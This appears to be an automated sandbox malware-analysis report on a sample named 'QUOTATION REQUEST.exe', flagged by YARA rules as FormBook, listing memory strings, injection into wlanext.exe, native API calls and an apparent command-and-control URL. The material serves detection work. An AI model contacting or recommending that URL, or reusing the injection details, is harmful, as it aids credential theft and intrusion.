          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: QUOTATION REQUEST.exeString found in binary or memory: https://github.com/unguest
          Source: QUOTATION REQUEST.exeString found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: wlanext.exe, 00000009.00000002.485777582.0000000003D12000.00000004.00000001.sdmpString found in binary or memory: https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDW

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: QUOTATION REQUEST.exe
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_004181C0 NtCreateFile,3_2_004181C0
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_00418270 NtReadFile,3_2_00418270
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_004182F0 NtClose,3_2_004182F0
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_004183A0 NtAllocateVirtualMemory,3_2_004183A0
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_004182EF NtClose,3_2_004182EF
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_004182BA NtReadFile,3_2_004182BA
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041839F NtAllocateVirtualMemory,3_2_0041839F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639A50 NtCreateFile,LdrInitializeThunk,9_2_03639A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_03639910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036399A0 NtCreateSection,LdrInitializeThunk,9_2_036399A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639860 NtQuerySystemInformation,LdrInitializeThunk,9_2_03639860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639840 NtDelayExecution,LdrInitializeThunk,9_2_03639840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639710 NtQueryInformationToken,LdrInitializeThunk,9_2_03639710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639FE0 NtCreateMutant,LdrInitializeThunk,9_2_03639FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639780 NtMapViewOfSection,LdrInitializeThunk,9_2_03639780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03639660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639650 NtQueryValueKey,LdrInitializeThunk,9_2_03639650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036396E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_036396E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036396D0 NtCreateKey,LdrInitializeThunk,9_2_036396D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639540 NtReadFile,LdrInitializeThunk,9_2_03639540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036395D0 NtClose,LdrInitializeThunk,9_2_036395D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639B00 NtSetValueKey,9_2_03639B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0363A3B0 NtGetContextThread,9_2_0363A3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639A20 NtResumeThread,9_2_03639A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639A00 NtProtectVirtualMemory,9_2_03639A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639A10 NtQuerySection,9_2_03639A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639A80 NtOpenDirectoryObject,9_2_03639A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639950 NtQueueApcThread,9_2_03639950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036399D0 NtCreateProcessEx,9_2_036399D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0363B040 NtSuspendThread,9_2_0363B040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639820 NtEnumerateKey,9_2_03639820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036398F0 NtReadVirtualMemory,9_2_036398F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036398A0 NtWriteVirtualMemory,9_2_036398A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639760 NtOpenProcess,9_2_03639760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0363A770 NtOpenThread,9_2_0363A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639770 NtSetInformationFile,9_2_03639770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639730 NtQueryVirtualMemory,9_2_03639730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0363A710 NtOpenProcessToken,9_2_0363A710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036397A0 NtUnmapViewOfSection,9_2_036397A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639670 NtQueryInformationProcess,9_2_03639670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639610 NtEnumerateValueKey,9_2_03639610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639560 NtWriteFile,9_2_03639560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03639520 NtWaitForSingleObject,9_2_03639520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0363AD30 NtSetContextThread,9_2_0363AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036395F0 NtQueryInformationFile,9_2_036395F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EE81C0 NtCreateFile,9_2_00EE81C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EE82F0 NtClose,9_2_00EE82F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EE8270 NtReadFile,9_2_00EE8270
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EE83A0 NtAllocateVirtualMemory,9_2_00EE83A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EE82EF NtClose,9_2_00EE82EF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EE82BA NtReadFile,9_2_00EE82BA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EE839F NtAllocateVirtualMemory,9_2_00EE839F
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 0_2_00C194A80_2_00C194A8
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 0_2_00C1C3A00_2_00C1C3A0
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 0_2_00C1A7580_2_00C1A758
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 0_2_04C1C9000_2_04C1C900
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0040102F3_2_0040102F
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_004012093_2_00401209
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041CB853_2_0041CB85
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_00408C5D3_2_00408C5D
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_00408C603_2_00408C60
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041B4A33_2_0041B4A3
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041B4A63_2_0041B4A6
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041BD743_2_0041BD74
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041C58C3_2_0041C58C
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_0041CF943_2_0041CF94
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036C2B289_2_036C2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036B03DA9_2_036B03DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036BDBD29_2_036BDBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0362EBB09_2_0362EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036AFA2B9_2_036AFA2B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036C22AE9_2_036C22AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036141209_2_03614120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_035FF9009_2_035FF900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036CE8249_2_036CE824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036B10029_2_036B1002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036C28EC9_2_036C28EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036220A09_2_036220A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036C20A89_2_036C20A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0360B0909_2_0360B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036C1FF19_2_036C1FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036CDFCE9_2_036CDFCE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03616E309_2_03616E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036BD6169_2_036BD616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036C2EF79_2_036C2EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036C1D559_2_036C1D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036C2D079_2_036C2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_035F0D209_2_035F0D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0360D5E09_2_0360D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036C25DD9_2_036C25DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036225819_2_03622581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_036BD4669_2_036BD466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0360841F9_2_0360841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EECB859_2_00EECB85
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EEB4A69_2_00EEB4A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EEB4A39_2_00EEB4A3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00ED8C609_2_00ED8C60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00ED8C5D9_2_00ED8C5D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EEC58C9_2_00EEC58C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00ED2D909_2_00ED2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EEBD749_2_00EEBD74
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00ED2FB09_2_00ED2FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00EECF949_2_00EECF94
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 035FB150 appears 45 times
          Source: QUOTATION REQUEST.exe, 00000000.00000002.233827964.00000000059E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exe, 00000000.00000002.227364139.00000000002E8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exe, 00000003.00000000.224914371.0000000000CF8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exe, 00000003.00000002.269766089.0000000001A52000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exeBinary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
          Source: QUOTATION REQUEST.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: QUOTATION REQUEST.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@15/6
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION REQUEST.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
          Source: QUOTATION REQUEST.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
